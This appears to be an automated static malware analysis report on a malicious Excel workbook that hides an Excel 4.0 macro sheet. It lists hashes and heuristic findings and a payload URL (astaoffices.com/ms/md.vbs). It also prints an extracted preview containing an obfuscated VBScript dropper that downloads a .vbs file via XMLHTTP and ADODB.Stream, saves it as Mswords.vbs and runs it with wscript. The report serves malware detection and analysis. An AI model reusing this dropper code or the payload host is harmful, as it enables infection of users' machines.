Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 1ec1cc958005b77e…

MALICIOUS

Office (OOXML) / .XLSX

429.9 KB Created: 2025-07-15 07:44:31 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2026-05-13
MD5: 3a373cee613155ed534cd43876db4793 SHA-1: 5f3ea9abf18937862833e46aa38fe8e6988cb545 SHA-256: 1ec1cc958005b77e4c8ef402355f4a7b83c6827f720a11ca10e75a8ed84e47f7
182 Risk Score

Heuristics 4

  • Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas critical OOXML_XLM_REASSEMBLED_PAYLOAD
    An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
  • URL reconstructed from XLM cell array (1 URL) critical OOXML_XLM_CELL_ARRAY_URL
    Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order plus FORMULA cell-reference concatenation in token order.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://astaoffices.com/ms/md.vbs Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.bin xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 3303 bytes
SHA-256: bd5e8ce2dc81a135b234c07676a4520dab881fbac0655fc44db18060bcb1364f
Preview script
First 1,000 lines of the extracted script
�  �  �   @      ��������    �  b   x           �  �  �         �   @   d           � $                                    �  �  %      ��    & �  ����        �  <     �             �  �  %      ��    &   b                        
S           @          k f u    C :    \ U s e     r s \ P u b     l i c \  B X     %      ��    &   c                        
H           5          f i l C     
 f i 7 r e r . v b s     B � B X     %      ��    &   d                         F           3   C       O n   E r r o r   R e s u m e   N e x t A�     %      ��    &   e                         @           -   C       b k 3 5 h u   =   " m i c r O s " A�     %      ��    &   f                         :           '   C       p l d d r f   =   " a D o " A�     %      ��    &   g                         @           -   C       q f v p a p   =   " d b . s T r " A�     %      ��    &   h                         H           5   C       v q c 3 4 g   =   " o f t . x    m l h "  A�     %      ��    &   i                         @           -   C     
 a 2 m r w b   =   " Dj    �    "  A�     %      ��    &   j                         �            �   C     > d i m   u z h 3 r i :   S e t   u z h 3 r i   =   c r e a t e o b j e c t ( p l d d r f   &   q f v p a p   &   " e a m " ) A�                   %      ��    &   k                         �            �   C     > d i m   s m 8 a t s :   S e t   s m 8 a t s   =   c r e a t e o b j e c t ( b k 3 5 h u   &   v q c 3 4 g   &   " T T P " ) A�     %      ��    &   l                         ^           K   C       s m 8 a t s . O p e n   " G E T " ,   a 2 m r w b ,   F a l s e A�     %      ��    &   m                         4           !   C       s m 8 a t s . S e n d A�     %      ��    &   n                         4           !   C       w i t h   u z h 3 r i A�     %      ��    &   o                         8           %   C     
         . t y p e   =   1 A�     %      ��    &   p                         0               C     	         . o p e n A�     %      ��    &   q                         Z           G   C               . w r i t e   s m 8 a t s . r e s p o n s e B o d y A�     %      ��    &   r                         l           Y   C     
         . s a v e t o f i    l e   "  C        M s w o r d s . v b s " ,   2  A�     %      ��    &   s                         .               C       e n d   w i t h A�     %      ��    &   t                         �            �   C       G e t O  3 b j e c t ( " n e w : 1 3 7 0 9 6 2 0 - C 2 7 9 - 1 1 C E - A 4 9 E - 4 4 4 5 5 3 5 4 0 0 0 0 " ) . O     p     e n ( "  C      
 M s w o r d s . v b s " )  A�     %      ��    &   u                         0               C     	 E r r . C l e a r A�     %      ��    &   v                                         C    A�     %      ��    &   w                         P           =      w s    c r i p t    C        f i 7 r e r . v     b s  B n     %      ��    &   x                        
                B 6     �  � � ��                                                                  @     ��F>�� 04 u-H�"F��[�-D���ȃ��N � ��;W�<X��R��j��E�� X�uh �7�    ����� ,L
�SX��$�    S H A - 5 1 2 � B                                                                  �    � 0ffffff�?ffffff�?      �?      �?333333�?333333�?�